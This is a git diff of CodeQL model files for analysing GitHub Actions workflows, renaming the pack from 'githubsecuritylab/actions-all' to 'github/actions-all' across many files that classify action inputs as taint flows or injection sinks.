["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index b571bded8ca8..64abc03a5fb3 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] 
diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index cd8f4f73e498..63eb8b21249d 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 6ebc3875e07b..170ceb2f95cb 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index 2b2dbd014b7f..e050b61815e5 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index 78b7eb1394c2..7d646dece692 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] 
diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index 0f146da2e0cb..fb03722c16ad 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index 483a3bf51727..a14748aead07 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index e06e75f7a3bf..4caf23c8812f 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index d0a88ff31673..1fa66b8ceb64 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index a29f84a55b5e..f2fed75539b4 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 0e11fe45b42c..dfaffaf87deb 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index 7e0970034a52..7bab09bca76d 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index 2f62f211da9c..86759ad40d5c 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index f94ad242321d..65474ba343d6 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index 5872399881c5..e3dd557084b6 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index 02c5dcd3ccaa..f3cb32b612ff 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 45bf0c57355a..639ee965f42e 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index 4ac3492c41c3..40d03569c8d5 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index a48da0cedfcc..ed20a5623750 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 6ca7aa86c06d..22725484ea46 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml 
+++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index 11f1f10980fe..d7839211e20d 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index 9ed2cb7908b8..3ff92757361b 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 7f279f37a45d..2e41b4f8eb5b 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] 
diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 68f434f4797a..62ff29bc9f0c 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 890a47c79fca..af4e15da03b0 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index aff5c3303165..2dbf47187144 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index 8f5e22fa2d96..4bc7e2518080 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index ff0131da99e3..845ae1770ed4 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index 1d82fb8f836f..780acdb98fff 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index 1e4cc21dd130..038f1639d3cf 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index ba729868a040..d948bda8bf43 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 504f0693977d..ed9eeb6b2520 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 48267b6d0820..f6441133c7af 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 26eea1d2341b..357ffc1c94a8 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 7993d827fa6f..0288103fd0ad 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index de48ea5a7092..05dca2f8262a 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index 36a9b24f0891..123dabe450e9 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index f04f8dda6c8e..a098666dba01 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index a37d6452d504..476c522f5ea0 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index 352eb51996af..ad369575c423 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index 44f34c11cb3d..e68306a454c8 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 3fd2e46296ab..923d267ac662 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index 881374b6c903..9557cbbee80d 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 6d77c866dc25..eea604dc8ddc 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 0b27c5845844..5ee8503193bc 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index 911d3e571558..44795adc64a0 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index 1ac668cf55ac..a1a7e28f5722 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index 5cf121dcef26..792a00ea3874 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index d946204e9b96..5ee9c5aefbed 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index c6839a7b004e..8b438734d5d6 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 9e708bbcc898..a62226055750 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index cfb67540b174..07c4cc427c10 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 7186433e6d27..77adcd6151d0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index d39aafe162ff..fe453b3086d2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index a3b53b3ec960..6d5296ba6d1f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index 2a35d22a10e0..14600fdc23ef 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml 
